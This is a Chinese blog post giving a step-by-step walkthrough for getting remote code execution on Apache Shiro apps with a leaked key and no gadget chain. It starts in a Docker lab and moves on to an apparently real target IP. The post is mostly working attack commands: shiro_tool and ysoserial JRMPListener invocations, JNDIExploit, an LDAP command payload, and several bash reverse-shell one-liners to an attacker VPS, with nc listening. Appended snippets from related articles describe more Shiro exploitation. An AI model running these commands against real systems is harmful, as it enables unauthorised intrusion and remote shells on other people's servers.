shiro泄露key无依赖链利用技巧

最新推荐文章于 2024-03-25 14:16:56 发布
最新推荐文章于 2024-03-25 14:16:56 发布
阅读量2.4k 收藏 13
点赞数 8
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64910183/article/details/135525127
版权

获取环境:

拉取镜像到本地

$ docker pull medicean/vulapps:s_shiro_1

启动环境

$ docker run -d -p 80:8080 medicean/vulapps:s_shiro_1

1.使用shiro_attack_2.2工具对目标系统进行检查,发现有默认key但是无利用链

image_ylgMY223mT.png

2.使用shior_tools.jar 直接对目标系统进行检测,检测完毕后会返回可执行操作

java   -jar  shiro_tool.jar http://10.11.10.108:8081/login.jsp 

2、选0让输入dnslog地址,通过dnslog测试有回显,这里有个注意点:使用 http://dnslog.cn/ 部分站点会拦截,可以换多个dnslog平台测试

image_htB_EhwPH9.png

dnslog有回显接下来就是拿shell了,这里由于固定思维,之前遇到的都是linux系统,先入为主觉得是Linux,结果没利用成功,一开始以为是防火墙拦截,后面探测了一下目录结构,发现是windows,所以这里payload要改变一下

3、在公网VPS上使用ysoserial开启端口,执行反弹命令

java -cp ysoserial-master-30099844c6-1.jar ysoserial.exploit.JRMPListener 1999 CommonsCollections5 "编码后bash命令"

 

image_wvD-c4KvV-.png

 这里面的编码的内容在步骤4

坑一:CommonsCollection1-5 如果不反弹shell,换着使用

4、bash反弹命令编辑

https://x.hacking8.com/java-runtime.html //编码的链接

下面三种执行命令,酌情选择:

坑二:这里执行的bash命令,首先要看对方运行系统,如果是linxu下面三个换着试,如果是win另行百度反弹命令。

bash -i >& /dev/tcp/VPSIP/7777 0>&1

/bin/bash -i > /dev/tcp/VPSIP/7777 0<&1 2>&1

0<&196;exec 196<>/dev/tcp/VPSIP/7777; sh <&196 >&196 2>&196

这里选择第二种,ip:是接受shell的vps的ip,端口:是vps用nc开启监听反弹到的端口

/bin/bash -i > /dev/tcp/192.168.14.222/8888  0<&1 2>&1

 

Windows:
java -cp ysoserial-0.0.6-SNAPSHOT-1.8.3.jar ysoserial.exploit.JRMPListener 88 CommonsBeanutils2 "ldap://VPS地址:1389/Basic/Command/Base64/d2hvYW1p"  
d2hvYW1p为命令的base64,这里是执行命令whoami

java -jar JNDIExploit-1.0-SNAPSHOT.jar -i VPS地址

5、nc监听

6、输入接收shell的vps的ip和java-ysoserial-JRMPListener开启的端口(这里选择1,使用JRMPClient反弹shell)

 

7、执行成功,反弹shell

 

 

 

Shirokey但无回显利用子-JRMP大法
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-12 4452
shiro在手天下我有,扫出key直接梭哈getshell,横扫内网。但要是像这种情况,直接下班拜拜跑路,子玩毛线…直到出现了这么一个工具可以通过JRMP协议探测是否存在漏洞,很显然上面工具是做不到的,实战中很可能因此丢掉一个shell。
实战shirokeyrce
mashiro_hibiki的博客
02-11 814
最近项目测试中,发现一个shiro框架的系统,经过工具扫描发现有可用的key,但是有能直接使用的,于是来复习一下有key来rce的打法。当利用工具发现有如下的情况,就可以尝试这种打法需有可用key可用JRMPClient可绕过WAF。
shiro无依赖利用
jy13172的博客
07-23 951
我们只要调用它的另一个构造函数,然后调用JDK或者CB自带的类就行了,同时还要满足两个条件,一方面就是继承。我们上次用的CC3的依赖,这次把这个依赖删了,使用shiro自带的依赖打。是嵌套的意思 跟进去发现,readMethod是我们传进去的参数。CC是对java集合类的增强,CB是对JavaBean的增强。虽然是CC4中的类,但是我们在传入系统的时候就把他修改成。是可以动态加载类的,也就是可以代码执行,所以。是我们传的参数,这里很可能是一个可以利用的点。,而且优先队列的参数也是可以控制的。
shiro无依赖利用及exp编写
Thunderclap的博客
02-08 1493
因为shiro是存在commons-beanutils的依赖的,这样我们可以通过构造原生的CB1的进行攻击shiro,但是我们通过ysoserial的CB1的会发现其实并不会成功。原因是因为CB1的里面其实是依赖于commons.collections包里面的部分内容的。如下发现是在我们构造BeanComparator的时候会调用,当有显式传入Comparator 的情况下,则默认使用ComparableComparator。
Shiro依赖链—Commons Beanutils
Le1a's Blog
03-23 7609
Shiro依赖链—Commons Beanutils 文章首发自: https://www.le1a.com/posts/a5f4a9e3/ 前言 前面学习了CC6在Shiro当中的应用,但是很多场景有使用CC依赖,那么还有其他利用方式吗?那就是Commons Beanutils! Commons Beanutils是什么? Commons-Beanutils是Apache提供的一个用于操作JAVA bean的工具包。里面提供了各种各样的工具类,让我们可以很方便的对bean对象的属性进行各种操作。 Ja
第17篇:Shiro反序列化在Weblogic下无利用的拿权限方法
ABC_123的博客
07-02 2564
Part1 前言Shiro反序列化漏洞虽然出现很多年了,但是在平时的攻防比赛与红队评估项目中还是能遇到。主站也许遇不到Shiro漏洞,但是主站边缘域名、全资子公司的子域名、边缘资产、微信公众号、微信小程序啥的,总能找到。现在遇到的shiro反序列化漏洞也是越来越难了,好多都是别人搞不定的。搞不定的原因要么是key比较偏门,要么是过不了waf防护,要么就是找不到可用的利.........
shiro分布式控制登录状态_使用Shiro和token进行无状态登录
weixin_39661405的博客
12-21 1101
使用Shiro和token进行无状态登录使用Shiro和token进行无状态登录我们之前可以使用shiro实现登录,但这些都是基于session或是cookie实现的,这些只能用于单机部署的服务,或是分布式服务共享会话,显然后者开销极大,所以JWT(JSON Web Token)应运而生,JWT是一套约定好的认证协议,通过请求携带令牌来访问那些需鉴权的接口。我们在这里使用token,原理类似,但是...
Shiro | SpringSecurity 学习笔记
qq_43024811的博客
07-13 441
SpringSecurity 1.环境配置 过滤器、拦截器… 不是功能性需求 安全在什么时候考虑?设计之初; 漏洞,隐私泄露; 架构确定之后 SpringSecurity、shiro:框架,简化配置;(简化过滤器、拦截器…) 认证、授权 功能权限 访问权限 菜单权限 环境配置 Spring2.0.xx(新版本可能会出问题) SpringSecurity依赖 2.用户认证和授权 导入SpringSecurity依赖 配置授权 看官网;看源码:父类源码;注解源码; 不同版本有不同的功能;
Shiro&SpringSecurity(面试题 )
qq_74872127的博客
03-25 759
Spring Security 是一个基于 Spring 框架的安全框架,提供了完整的安全解决方案,包括认证、授权、攻击防护等功能。其核心功能包括认证:指的是验证某个用户是否为系统中的合法主体,也就是说用户能否访问该系统。授权:指的是验证某个用户是否有权限执行某个操作攻击防护:指的是防止伪造身份攻击防护:提供了多种防护机制,如跨站点请求伪造(CSRF)防护、注入攻击防护等。会话管理:提供了会话管理机制,如令牌管理、并发控制等。监视与管理:提供了监视与管理机制,如访问日志记录、审计等。
Shiro之会话管理&缓存管理
m0_67477525的博客
08-27 354
Ehcache是现在最流行的纯Java开源缓存框架,配置简单、结构清晰、功能强大。是Hibernate中默认CacheProvider。Ehcache是一种广泛使用的开源Java分布式缓存。主要面向通用缓存,Java EE和轻量级容器。它具有内存和磁盘存储,缓存加载器,缓存扩展,缓存异常处理程序,一个gzip缓存servlet过滤器,支持REST和SOAP api等特点。System.out.println("用户授权...");...
shiro详解,看这一篇差不多理解了shiro的基础了
zhuzi的博客
07-30 924
文章目录shiro学习简介功能运行原理小demo对于shiro.ini:对于ShiroDemo.java:Realm认证授权在springboot中集成shiro创建springboot项目导入依赖编写配置文件1.先自定义一个realm2.编写shiroconfig3.编写几个页面来进行测试实现登录拦截实现用户认证常用的几个异常类用户授权 shiro学习 简介 ​ 在以往的权限管理中,我们的权限管理通常是有以下几个步骤: 1.创建用户,分配权限。 2.用户登录,权限拦截器拦截请求,识别当前用户登录信息 3
从commons-beanutils反序列化到shiro无依赖的漏洞利用
weixin_43695820的博客
03-29 1365
1 环境 jdk 1.8u40 commons-beanutils <dependency> <groupId>commons-beanutils</groupId> <artifactId>commons-beanutils</artifactId> <version>1.8.3</version> </dependency> javassist <dependen
Apache shiro 反序列化及利用
qq_37561898的博客
04-27 3294
convertBytestoPrincipals 解密 --> 反序列化 decrypt 解密 函数需要通过key 解密 密钥值是固定的 触发反序列化流程:读取cookie -> base64解码 -> AES解密 -> 反序列化 DNS可以出网,使用dnslog进行攻击 结合Dnslog与URLDNS方法有一个前提是DNS能出网。那么在不出网的情况下就需要找一个替代的方案了。结合SQL盲注的思路,可以考虑执行如下代码结合时间延迟进行判断,若系统是lin..
shiro defaultkey利用_深入利用Shiro反序列化漏洞
weixin_35734296的博客
01-06 3148
0x00:背景shiro反序列化RCE是在实战中一个比较高频且舒适的漏洞,shiro框架在java web登录认证中广泛应用,每一次目标较多的情况下几乎都可以遇见shiro,而因其payload本身就是加密的,无攻击特征,所以几乎不会被waf检测和拦截。0x01:shiro反序列化的原理先来看看shiro在1.2.4版本反序列化的原理这里是shiro拿到cookie后的关键代码,先dec...
shiro反序列化生成KEY
m0_67392273的博客
08-24 551
Shiro反序列化时候的第一步需要猜KEY,此番操作就像遍历弱口令似的。
记一次攻防演练实战总结
渗透测试研究中心
10-14 2072
0x01 外网打点资产发现多测绘平台搜索https://hunter.qianxin.com/https://fofa.info/https://quake.360.cn/多语法搜索假如某个目标站点为xxxx.com ,我们可以通过不同的语法进行资产搜集,搜集的资产会更全面这里以fofa为例domain="xxxx.com" host="xxxx.com" header="xxxx.co...
heapdump泄露Shiro key从而RCE
渗透测试研究中心
12-05 4887
1. 简介我搭建了一个Spring heapdump泄露shiro key从而RCE的漏洞环境,Github地址:https://github.com/P4r4d1se/heapdump_shiro_vuln漏洞利用条件:Spring Shiro环境存在heapdump文件泄露存在可利用2. 漏洞原理Shiro相关的漏洞原理和调试分析已经有很多大佬分享过了,这里不再赘述,这里主要针对这个漏洞环...
shiro key文件
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-01 1568
​下面结合实战以及shiro的CookieRememberMeManaer的调用过程,浅谈获取shiro key文件的几种方式。 shiro key文件的获取方式:1结合Dnslog与URLDNS;2利用时间延迟或报错;3结合CookieRememberMeManaer 1结合Dnslog与URLDNS 在进行漏洞探测的时候,一般会使用ysoserial-URLDNS-gadget结合dnslog进检测,其受JDK版本和相关的安全策略影响,除非存在网络限制DNS不能出网。 通过判断dnslog是否
shirokey
最新发布
03-29
### 关于 Apache Shiro 的密钥配置 在 Apache Shiro 中,密钥通常用于加密和解密操作,尤其是在与 JWT 集成时。通过使用对称算法(如 HMAC-SHA),可以生成安全的签名来验证令牌的真实性[^1]。为了配置密钥,可以通过以下方式进行设置: #### 密钥配置方法 1. **硬编码方式** 将密钥直接写入到代码中是一种简单的方式,但不推荐用于生产环境。例如,在 Java 代码中定义一个静态字符串作为密钥: ```java public class JwtUtil { private static final String SECRET_KEY = "your-secret-key"; // 使用SECRET_KEY进行加解密逻辑... } ``` 2. **外部化配置** 更安全的做法是将密钥存储在外置化的配置文件中,比如 `application.properties` 或者 `application.yml` 文件。这样可以在不同环境中灵活调整密钥值而不修改代码。 - 对于 Spring Boot 应用程序,可以在 `application.properties` 中指定密钥: ```properties shiro.jwt.secretKey=your-secret-key ``` - 然后在代码中读取该属性: ```java @Value("${shiro.jwt.secretKey}") private String secretKey; // 使用secretKey进行加解密逻辑... ``` 3. **基于环境变量或秘钥管理工具** 如果需要更高的安全性,建议利用操作系统级别的环境变量或者专业的秘钥管理服务(如 AWS Secrets Manager、Azure Key Vault)。这种方式能够有效防止敏感数据泄露。 --- ### 式调用实现方式 Shiro 提供了一种简洁的方式来处理过滤器式的请求拦截规则。这些规则决定了哪些 URL 路径应该被保护以及如何对其进行身份验证或授权检查。以下是常见的几种配置模式及其含义[^4]: | 过滤器名称 | 描述 | |------------|----------------------------------------------------------------------| | anon | 表示无需登录即可访问 | | authc | 表示必须经过身份验证才能访问 | | logout | 自动执行登出操作 | | user | 已经记住用户的会话可以直接访问 | #### 实现式调用的具体步骤 假设我们正在开发一个 RESTful API 并希望某些路径仅限已认证用户访问,则可在 XML 配置文件中声明如下规则: ```xml <bean id="shiroFilter" class="org.apache.shiro.spring.web.ShiroFilterFactoryBean"> <property name="filterChainDefinitions"> <value> /public/** = anon <!-- 所有/public下的资源都允许匿名访问 --> /api/login = anon <!-- 登录接口也开放给未认证用户 --> /api/logout = logout <!-- 注销接口由Shiro自动处理 --> /api/userinfo = user <!-- 用户信息查询需确认当前主体是否已被识别 --> /api/admin/** = roles[admin]<!-- 只有具备'admin'角色的人才可以进入此目录 --> /** = authc <!-- 默认情况下其他所有API都需要先完成身份验证 --> </value> </property> </bean> ``` 如果采用注解形式而非 XML 方式,则可通过自定义 Filter Chain 定义类完成相同功能: ```java @Configuration public class ShiroConfig { @Bean public ShiroFilterChainDefinition shiroFilterChainDefinition() { DefaultShiroFilterChainDefinition chainDef = new DefaultShiroFilterChainDefinition(); // 添加具体URL匹配规则 chainDef.addPathDefinition("/public/**", "anon"); chainDef.addPathDefinition("/api/login", "anon"); chainDef.addPathDefinition("/api/logout", "logout"); chainDef.addPathDefinition("/api/userinfo", "user"); chainDef.addPathDefinition("/api/admin/**", "roles[admin]"); chainDef.addPathDefinition("/**", "authc"); return chainDef; } } ``` 上述两种方法均实现了针对特定 URI 设置不同的权限控制策略的目标。 --- ### 总结 通过对密钥的安全管理和合理运用过滤器机制,开发者能够在保障应用安全的同时简化复杂的业务流程设计。无论是简单的 Web 应用还是微服务体系架构下复杂的服务间通信场景,Apache Shiro 均提供了强大而灵活的支持方案[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试中心

各位师傅,觉得文章不错可支持下

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值